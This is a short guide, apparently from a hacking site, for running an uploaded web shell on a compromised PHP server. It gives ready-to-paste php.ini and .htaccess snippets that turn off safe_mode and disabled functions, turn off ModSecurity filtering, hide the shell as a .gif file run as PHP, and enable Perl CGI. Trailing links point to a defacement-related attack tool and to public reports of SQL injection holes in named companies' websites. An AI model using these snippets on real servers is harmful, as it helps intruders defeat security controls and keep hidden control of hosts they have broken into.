Safemode = On (Secure)
Disables Functions =
dl, passthru, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid
================

Create A File “Php.ini” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
———————
Paste This
———————
safe_mode = OFF
disable_functions = NONE
———————

================
ModSecurity = On
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
————————
Paste This
————————
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
————————

================
Hiding Your Shell
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
But Change File Extension To .gif (You Can Use Any Other extension But Change .gif In .htaccess To Extension You Chose) Then Open Your Shell From There
————————
Paste This
————————
AddType application/x-httpd-php .gif
————————

================
Activate Perl And CGI
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
————————
Paste This
————————
Options ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
————————

Explore More

SpiderLabs Defacetool

DefaceTool is an open-source Java Server Faces(JSF)testing tool for decoding view state and creating view state attack vectors. The tool can be used to create XSS attacks and session and

Critical SQL Injection in www.kmd.com KMD Group of Companies

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.kmd.com.sg owned by KMD Group of Companies These are some information from Vulneral Site http://www.kmd.com.sg

Critical Blind SQL injection in ChartNexus.com

PlanetCreator has reported another critical Blind SQL Injection (vulnerability) on http://www.starinvestorrelations.com/ which owned by FiNEX Solutions Pte. Ltd. (“FiNEX Solutions”) powered by http://www.chartnexus.com/ This vulnerability has been alerted to :-